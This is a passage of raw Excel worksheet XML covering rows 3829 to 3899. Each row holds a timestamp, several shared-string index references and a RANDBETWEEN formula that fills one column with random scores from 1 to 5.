        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3829" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3829" s="1">
        <v>43487.404502314814</v>
      </c>
      <c r="B3829" t="s">
        <v>5</v>
      </c>
      <c r="C3829" t="s">
        <v>10</v>
      </c>
      <c r="D3829" t="s">
        <v>86</v>
      </c>
      <c r="E3829" s="2" t="s">
        <v>3710</v>
      </c>
      <c r="F3829">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3830" s="1">
        <v>43487.401296296295</v>
      </c>
      <c r="B3830" t="s">
        <v>19</v>
      </c>
      <c r="C3830" t="s">
        <v>10</v>
      </c>
      <c r="D3830" t="s">
        <v>667</v>
      </c>
      <c r="E3830" t="s">
        <v>3711</v>
      </c>
      <c r="F3830">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3831" s="1">
        <v>43487.398888888885</v>
      </c>
      <c r="B3831" t="s">
        <v>19</v>
      </c>
      <c r="C3831" t="s">
        <v>10</v>
      </c>
      <c r="D3831" t="s">
        <v>56</v>
      </c>
      <c r="E3831" t="s">
        <v>3712</v>
      </c>
      <c r="F3831">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3832" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3832" s="1">
        <v>43487.381365740737</v>
      </c>
      <c r="B3832" t="s">
        <v>13</v>
      </c>
      <c r="C3832" t="s">
        <v>16</v>
      </c>
      <c r="E3832" s="2" t="s">
        <v>3713</v>
      </c>
      <c r="F3832">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3833" s="1">
        <v>43487.378113425926</v>
      </c>
      <c r="B3833" t="s">
        <v>1305</v>
      </c>
      <c r="C3833" t="s">
        <v>260</v>
      </c>
      <c r="E3833" t="s">
        <v>3714</v>
      </c>
      <c r="F3833">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3834" s="1">
        <v>43487.369629629633</v>
      </c>
      <c r="B3834" t="s">
        <v>5</v>
      </c>
      <c r="C3834" t="s">
        <v>10</v>
      </c>
      <c r="D3834" t="s">
        <v>41</v>
      </c>
      <c r="E3834" t="s">
        <v>3715</v>
      </c>
      <c r="F3834">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3835" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3835" s="1">
        <v>43487.368888888886</v>
      </c>
      <c r="B3835" t="s">
        <v>35</v>
      </c>
      <c r="C3835" t="s">
        <v>43</v>
      </c>
      <c r="E3835" s="2" t="s">
        <v>3716</v>
      </c>
      <c r="F3835">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3836" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3836" s="1">
        <v>43487.365856481483</v>
      </c>
      <c r="B3836" t="s">
        <v>13</v>
      </c>
      <c r="C3836" t="s">
        <v>1068</v>
      </c>
      <c r="E3836" s="2" t="s">
        <v>3717</v>
      </c>
      <c r="F3836">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3837" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A3837" s="1">
        <v>43487.352905092594</v>
      </c>
      <c r="B3837" t="s">
        <v>19</v>
      </c>
      <c r="C3837" t="s">
        <v>134</v>
      </c>
      <c r="E3837" s="2" t="s">
        <v>3718</v>
      </c>
      <c r="F3837">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3838" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3838" s="1">
        <v>43487.349293981482</v>
      </c>
      <c r="B3838" t="s">
        <v>19</v>
      </c>
      <c r="C3838" t="s">
        <v>48</v>
      </c>
      <c r="E3838" s="2" t="s">
        <v>3719</v>
      </c>
      <c r="F3838">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3839" s="1">
        <v>43487.333402777775</v>
      </c>
      <c r="B3839" t="s">
        <v>1305</v>
      </c>
      <c r="C3839" t="s">
        <v>60</v>
      </c>
      <c r="E3839" t="s">
        <v>3720</v>
      </c>
      <c r="F3839">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3840" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3840" s="1">
        <v>43487.312604166669</v>
      </c>
      <c r="B3840" t="s">
        <v>5</v>
      </c>
      <c r="C3840" t="s">
        <v>41</v>
      </c>
      <c r="E3840" s="2" t="s">
        <v>3721</v>
      </c>
      <c r="F3840">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3841" s="1">
        <v>43487.294178240743</v>
      </c>
      <c r="B3841" t="s">
        <v>1305</v>
      </c>
      <c r="C3841" t="s">
        <v>60</v>
      </c>
      <c r="E3841" t="s">
        <v>3722</v>
      </c>
      <c r="F3841">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3842" s="1">
        <v>43487.292199074072</v>
      </c>
      <c r="B3842" t="s">
        <v>19</v>
      </c>
      <c r="C3842" t="s">
        <v>41</v>
      </c>
      <c r="E3842" t="s">
        <v>3723</v>
      </c>
      <c r="F3842">
        <f t="shared" ref="F3842:F3905" ca="1" si="60">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="3843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3843" s="1">
        <v>43487.291238425925</v>
      </c>
      <c r="B3843" t="s">
        <v>19</v>
      </c>
      <c r="C3843" t="s">
        <v>48</v>
      </c>
      <c r="E3843" t="s">
        <v>3724</v>
      </c>
      <c r="F3843">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3844" s="1">
        <v>43487.284872685188</v>
      </c>
      <c r="B3844" t="s">
        <v>35</v>
      </c>
      <c r="C3844" t="s">
        <v>10</v>
      </c>
      <c r="D3844" t="s">
        <v>6</v>
      </c>
      <c r="E3844" t="s">
        <v>3725</v>
      </c>
      <c r="F3844">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3845" s="1">
        <v>43487.226736111108</v>
      </c>
      <c r="B3845" t="s">
        <v>13</v>
      </c>
      <c r="C3845" t="s">
        <v>63</v>
      </c>
      <c r="E3845" t="s">
        <v>3726</v>
      </c>
      <c r="F3845">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3846" s="1">
        <v>43487.224606481483</v>
      </c>
      <c r="B3846" t="s">
        <v>35</v>
      </c>
      <c r="C3846" t="s">
        <v>63</v>
      </c>
      <c r="E3846" t="s">
        <v>3727</v>
      </c>
      <c r="F3846">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3847" s="1">
        <v>43487.221284722225</v>
      </c>
      <c r="B3847" t="s">
        <v>13</v>
      </c>
      <c r="C3847" t="s">
        <v>48</v>
      </c>
      <c r="E3847" t="s">
        <v>3728</v>
      </c>
      <c r="F3847">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3848" s="1">
        <v>43487.20584490741</v>
      </c>
      <c r="B3848" t="s">
        <v>35</v>
      </c>
      <c r="C3848" t="s">
        <v>60</v>
      </c>
      <c r="E3848" t="s">
        <v>3729</v>
      </c>
      <c r="F3848">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3849" s="1">
        <v>43487.201111111113</v>
      </c>
      <c r="B3849" t="s">
        <v>19</v>
      </c>
      <c r="C3849" t="s">
        <v>189</v>
      </c>
      <c r="E3849" t="s">
        <v>3730</v>
      </c>
      <c r="F3849">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3850" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3850" s="1">
        <v>43487.181666666664</v>
      </c>
      <c r="B3850" t="s">
        <v>5</v>
      </c>
      <c r="C3850" t="s">
        <v>197</v>
      </c>
      <c r="E3850" s="2" t="s">
        <v>3731</v>
      </c>
      <c r="F3850">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3851" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3851" s="1">
        <v>43487.179027777776</v>
      </c>
      <c r="B3851" t="s">
        <v>19</v>
      </c>
      <c r="C3851" t="s">
        <v>724</v>
      </c>
      <c r="E3851" s="2" t="s">
        <v>3732</v>
      </c>
      <c r="F3851">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3852" s="1">
        <v>43487.178414351853</v>
      </c>
      <c r="B3852" t="s">
        <v>13</v>
      </c>
      <c r="C3852" t="s">
        <v>144</v>
      </c>
      <c r="E3852" t="s">
        <v>3733</v>
      </c>
      <c r="F3852">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3853" s="1">
        <v>43487.178379629629</v>
      </c>
      <c r="B3853" t="s">
        <v>13</v>
      </c>
      <c r="C3853" t="s">
        <v>144</v>
      </c>
      <c r="E3853" t="s">
        <v>3733</v>
      </c>
      <c r="F3853">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3854" s="1">
        <v>43487.177430555559</v>
      </c>
      <c r="B3854" t="s">
        <v>5</v>
      </c>
      <c r="C3854" t="s">
        <v>48</v>
      </c>
      <c r="E3854" t="s">
        <v>3734</v>
      </c>
      <c r="F3854">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3855" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3855" s="1">
        <v>43487.162719907406</v>
      </c>
      <c r="B3855" t="s">
        <v>5</v>
      </c>
      <c r="C3855" t="s">
        <v>71</v>
      </c>
      <c r="E3855" s="2" t="s">
        <v>3735</v>
      </c>
      <c r="F3855">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3856" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3856" s="1">
        <v>43487.161168981482</v>
      </c>
      <c r="B3856" t="s">
        <v>19</v>
      </c>
      <c r="C3856" t="s">
        <v>48</v>
      </c>
      <c r="E3856" s="2" t="s">
        <v>3736</v>
      </c>
      <c r="F3856">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3857" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3857" s="1">
        <v>43487.160497685189</v>
      </c>
      <c r="B3857" t="s">
        <v>1305</v>
      </c>
      <c r="C3857" t="s">
        <v>71</v>
      </c>
      <c r="E3857" s="2" t="s">
        <v>3737</v>
      </c>
      <c r="F3857">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3858" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A3858" s="1">
        <v>43487.156099537038</v>
      </c>
      <c r="B3858" t="s">
        <v>35</v>
      </c>
      <c r="C3858" t="s">
        <v>461</v>
      </c>
      <c r="E3858" s="2" t="s">
        <v>3738</v>
      </c>
      <c r="F3858">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3859" s="1">
        <v>43487.140625</v>
      </c>
      <c r="B3859" t="s">
        <v>5</v>
      </c>
      <c r="C3859" t="s">
        <v>41</v>
      </c>
      <c r="E3859" t="s">
        <v>3739</v>
      </c>
      <c r="F3859">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3860" s="1">
        <v>43487.140300925923</v>
      </c>
      <c r="B3860" t="s">
        <v>1305</v>
      </c>
      <c r="C3860" t="s">
        <v>65</v>
      </c>
      <c r="E3860" t="s">
        <v>3740</v>
      </c>
      <c r="F3860">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3861" s="1">
        <v>43487.129050925927</v>
      </c>
      <c r="B3861" t="s">
        <v>13</v>
      </c>
      <c r="C3861" t="s">
        <v>41</v>
      </c>
      <c r="E3861" t="s">
        <v>3741</v>
      </c>
      <c r="F3861">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3862" s="1">
        <v>43487.078229166669</v>
      </c>
      <c r="B3862" t="s">
        <v>13</v>
      </c>
      <c r="C3862" t="s">
        <v>724</v>
      </c>
      <c r="E3862" t="s">
        <v>3742</v>
      </c>
      <c r="F3862">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3863" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3863" s="1">
        <v>43487.053310185183</v>
      </c>
      <c r="B3863" t="s">
        <v>5</v>
      </c>
      <c r="C3863" t="s">
        <v>71</v>
      </c>
      <c r="E3863" s="2" t="s">
        <v>3743</v>
      </c>
      <c r="F3863">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3864" s="1">
        <v>43487.045532407406</v>
      </c>
      <c r="B3864" t="s">
        <v>19</v>
      </c>
      <c r="C3864" t="s">
        <v>10</v>
      </c>
      <c r="D3864" t="s">
        <v>33</v>
      </c>
      <c r="E3864" t="s">
        <v>3744</v>
      </c>
      <c r="F3864">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3865" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A3865" s="1">
        <v>43487.036921296298</v>
      </c>
      <c r="B3865" t="s">
        <v>19</v>
      </c>
      <c r="C3865" t="s">
        <v>408</v>
      </c>
      <c r="E3865" s="2" t="s">
        <v>3745</v>
      </c>
      <c r="F3865">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3866" s="1">
        <v>43487.012407407405</v>
      </c>
      <c r="B3866" t="s">
        <v>19</v>
      </c>
      <c r="C3866" t="s">
        <v>10</v>
      </c>
      <c r="D3866" t="s">
        <v>36</v>
      </c>
      <c r="E3866" t="s">
        <v>3746</v>
      </c>
      <c r="F3866">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3867" s="1">
        <v>43486.902175925927</v>
      </c>
      <c r="B3867" t="s">
        <v>5</v>
      </c>
      <c r="C3867" t="s">
        <v>10</v>
      </c>
      <c r="D3867" t="s">
        <v>20</v>
      </c>
      <c r="E3867" t="s">
        <v>3747</v>
      </c>
      <c r="F3867">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3868" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3868" s="1">
        <v>43486.853402777779</v>
      </c>
      <c r="B3868" t="s">
        <v>5</v>
      </c>
      <c r="C3868" t="s">
        <v>41</v>
      </c>
      <c r="E3868" s="2" t="s">
        <v>3748</v>
      </c>
      <c r="F3868">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3869" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3869" s="1">
        <v>43486.853402777779</v>
      </c>
      <c r="B3869" t="s">
        <v>5</v>
      </c>
      <c r="C3869" t="s">
        <v>41</v>
      </c>
      <c r="E3869" s="2" t="s">
        <v>3748</v>
      </c>
      <c r="F3869">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3870" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A3870" s="1">
        <v>43486.852395833332</v>
      </c>
      <c r="B3870" t="s">
        <v>35</v>
      </c>
      <c r="C3870" t="s">
        <v>845</v>
      </c>
      <c r="E3870" s="2" t="s">
        <v>3749</v>
      </c>
      <c r="F3870">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3871" s="1">
        <v>43486.785914351851</v>
      </c>
      <c r="B3871" t="s">
        <v>19</v>
      </c>
      <c r="C3871" t="s">
        <v>10</v>
      </c>
      <c r="D3871" t="s">
        <v>89</v>
      </c>
      <c r="E3871" t="s">
        <v>3750</v>
      </c>
      <c r="F3871">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3872" s="1">
        <v>43486.731087962966</v>
      </c>
      <c r="B3872" t="s">
        <v>5</v>
      </c>
      <c r="C3872" t="s">
        <v>10</v>
      </c>
      <c r="D3872" t="s">
        <v>244</v>
      </c>
      <c r="E3872" t="s">
        <v>3751</v>
      </c>
      <c r="F3872">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3873" s="1">
        <v>43486.729027777779</v>
      </c>
      <c r="B3873" t="s">
        <v>13</v>
      </c>
      <c r="C3873" t="s">
        <v>10</v>
      </c>
      <c r="D3873" t="s">
        <v>6</v>
      </c>
      <c r="E3873" t="s">
        <v>3752</v>
      </c>
      <c r="F3873">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3874" s="1">
        <v>43486.72519675926</v>
      </c>
      <c r="B3874" t="s">
        <v>5</v>
      </c>
      <c r="C3874" t="s">
        <v>10</v>
      </c>
      <c r="D3874" t="s">
        <v>17</v>
      </c>
      <c r="E3874" t="s">
        <v>3753</v>
      </c>
      <c r="F3874">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3875" s="1">
        <v>43486.702488425923</v>
      </c>
      <c r="B3875" t="s">
        <v>19</v>
      </c>
      <c r="C3875" t="s">
        <v>10</v>
      </c>
      <c r="D3875" t="s">
        <v>192</v>
      </c>
      <c r="E3875" t="s">
        <v>3754</v>
      </c>
      <c r="F3875">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3876" s="1">
        <v>43486.680115740739</v>
      </c>
      <c r="B3876" t="s">
        <v>19</v>
      </c>
      <c r="C3876" t="s">
        <v>6</v>
      </c>
      <c r="D3876" t="s">
        <v>25</v>
      </c>
      <c r="F3876">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3877" s="1">
        <v>43486.677303240744</v>
      </c>
      <c r="B3877" t="s">
        <v>5</v>
      </c>
      <c r="C3877" t="s">
        <v>6</v>
      </c>
      <c r="D3877" t="s">
        <v>25</v>
      </c>
      <c r="F3877">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3878" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3878" s="1">
        <v>43486.674768518518</v>
      </c>
      <c r="B3878" t="s">
        <v>19</v>
      </c>
      <c r="C3878" t="s">
        <v>10</v>
      </c>
      <c r="D3878" t="s">
        <v>80</v>
      </c>
      <c r="E3878" s="2" t="s">
        <v>3755</v>
      </c>
      <c r="F3878">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3879" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3879" s="1">
        <v>43486.635555555556</v>
      </c>
      <c r="B3879" t="s">
        <v>5</v>
      </c>
      <c r="C3879" t="s">
        <v>10</v>
      </c>
      <c r="D3879" t="s">
        <v>80</v>
      </c>
      <c r="E3879" s="2" t="s">
        <v>3756</v>
      </c>
      <c r="F3879">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3880" s="1">
        <v>43486.604467592595</v>
      </c>
      <c r="B3880" t="s">
        <v>35</v>
      </c>
      <c r="C3880" t="s">
        <v>6</v>
      </c>
      <c r="D3880" t="s">
        <v>25</v>
      </c>
      <c r="F3880">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3881" s="1">
        <v>43486.603958333333</v>
      </c>
      <c r="B3881" t="s">
        <v>13</v>
      </c>
      <c r="C3881" t="s">
        <v>60</v>
      </c>
      <c r="E3881" t="s">
        <v>3757</v>
      </c>
      <c r="F3881">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3882" s="1">
        <v>43486.603946759256</v>
      </c>
      <c r="B3882" t="s">
        <v>13</v>
      </c>
      <c r="C3882" t="s">
        <v>60</v>
      </c>
      <c r="E3882" t="s">
        <v>3757</v>
      </c>
      <c r="F3882">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3883" s="1">
        <v>43486.595706018517</v>
      </c>
      <c r="B3883" t="s">
        <v>35</v>
      </c>
      <c r="C3883" t="s">
        <v>71</v>
      </c>
      <c r="E3883" t="s">
        <v>3758</v>
      </c>
      <c r="F3883">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3884" s="1">
        <v>43486.595625000002</v>
      </c>
      <c r="B3884" t="s">
        <v>35</v>
      </c>
      <c r="C3884" t="s">
        <v>6</v>
      </c>
      <c r="E3884" t="s">
        <v>3485</v>
      </c>
      <c r="F3884">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3885" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3885" s="1">
        <v>43486.593414351853</v>
      </c>
      <c r="B3885" t="s">
        <v>5</v>
      </c>
      <c r="C3885" t="s">
        <v>6</v>
      </c>
      <c r="D3885" t="s">
        <v>821</v>
      </c>
      <c r="E3885" s="2" t="s">
        <v>3759</v>
      </c>
      <c r="F3885">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3886" s="1">
        <v>43486.588263888887</v>
      </c>
      <c r="B3886" t="s">
        <v>5</v>
      </c>
      <c r="C3886" t="s">
        <v>6</v>
      </c>
      <c r="E3886" t="s">
        <v>3485</v>
      </c>
      <c r="F3886">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3887" s="1">
        <v>43486.584409722222</v>
      </c>
      <c r="B3887" t="s">
        <v>5</v>
      </c>
      <c r="C3887" t="s">
        <v>6</v>
      </c>
      <c r="D3887" t="s">
        <v>25</v>
      </c>
      <c r="F3887">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3888" s="1">
        <v>43486.583969907406</v>
      </c>
      <c r="B3888" t="s">
        <v>5</v>
      </c>
      <c r="C3888" t="s">
        <v>6</v>
      </c>
      <c r="D3888" t="s">
        <v>25</v>
      </c>
      <c r="E3888" t="s">
        <v>3485</v>
      </c>
      <c r="F3888">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3889" s="1">
        <v>43486.58357638889</v>
      </c>
      <c r="B3889" t="s">
        <v>5</v>
      </c>
      <c r="C3889" t="s">
        <v>6</v>
      </c>
      <c r="D3889" t="s">
        <v>25</v>
      </c>
      <c r="E3889" t="s">
        <v>1920</v>
      </c>
      <c r="F3889">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3890" s="1">
        <v>43486.582696759258</v>
      </c>
      <c r="B3890" t="s">
        <v>5</v>
      </c>
      <c r="C3890" t="s">
        <v>6</v>
      </c>
      <c r="D3890" t="s">
        <v>25</v>
      </c>
      <c r="E3890" t="s">
        <v>1920</v>
      </c>
      <c r="F3890">
        <f t="shared" ca="1" si="60"/>
        <v>2</v>
      </c>
    </row>
    <row r="3891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3891" s="1">
        <v>43486.582268518519</v>
      </c>
      <c r="B3891" t="s">
        <v>5</v>
      </c>
      <c r="C3891" t="s">
        <v>6</v>
      </c>
      <c r="D3891" t="s">
        <v>25</v>
      </c>
      <c r="E3891" t="s">
        <v>1920</v>
      </c>
      <c r="F3891">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3892" s="1">
        <v>43486.580613425926</v>
      </c>
      <c r="B3892" t="s">
        <v>5</v>
      </c>
      <c r="C3892" t="s">
        <v>6</v>
      </c>
      <c r="E3892" t="s">
        <v>3485</v>
      </c>
      <c r="F3892">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3893" s="1">
        <v>43486.574317129627</v>
      </c>
      <c r="B3893" t="s">
        <v>13</v>
      </c>
      <c r="C3893" t="s">
        <v>10</v>
      </c>
      <c r="D3893" t="s">
        <v>33</v>
      </c>
      <c r="E3893" t="s">
        <v>3760</v>
      </c>
      <c r="F3893">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3894" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3894" s="1">
        <v>43486.569409722222</v>
      </c>
      <c r="B3894" t="s">
        <v>19</v>
      </c>
      <c r="C3894" t="s">
        <v>10</v>
      </c>
      <c r="D3894" t="s">
        <v>52</v>
      </c>
      <c r="E3894" s="2" t="s">
        <v>3761</v>
      </c>
      <c r="F3894">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3895" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A3895" s="1">
        <v>43486.557673611111</v>
      </c>
      <c r="B3895" t="s">
        <v>13</v>
      </c>
      <c r="C3895" t="s">
        <v>10</v>
      </c>
      <c r="D3895" t="s">
        <v>17</v>
      </c>
      <c r="E3895" s="2" t="s">
        <v>3762</v>
      </c>
      <c r="F3895">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3896" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3896" s="1">
        <v>43486.548796296294</v>
      </c>
      <c r="B3896" t="s">
        <v>5</v>
      </c>
      <c r="C3896" t="s">
        <v>10</v>
      </c>
      <c r="D3896" t="s">
        <v>86</v>
      </c>
      <c r="E3896" s="2" t="s">
        <v>3763</v>
      </c>
      <c r="F3896">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3897" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A3897" s="1">
        <v>43486.539456018516</v>
      </c>
      <c r="B3897" t="s">
        <v>5</v>
      </c>
      <c r="C3897" t="s">
        <v>10</v>
      </c>
      <c r="E3897" s="2" t="s">
        <v>3764</v>
      </c>
      <c r="F3897">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3898" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A3898" s="1">
        <v>43486.515092592592</v>
      </c>
      <c r="B3898" t="s">
        <v>5</v>
      </c>
      <c r="C3898" t="s">
        <v>10</v>
      </c>
      <c r="D3898" t="s">
        <v>52</v>
      </c>
      <c r="E3898" s="2" t="s">
        <v>3765</v>
      </c>
      <c r="F3898">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3899" s="1">
        <v>43486.509293981479</v>
      </c>
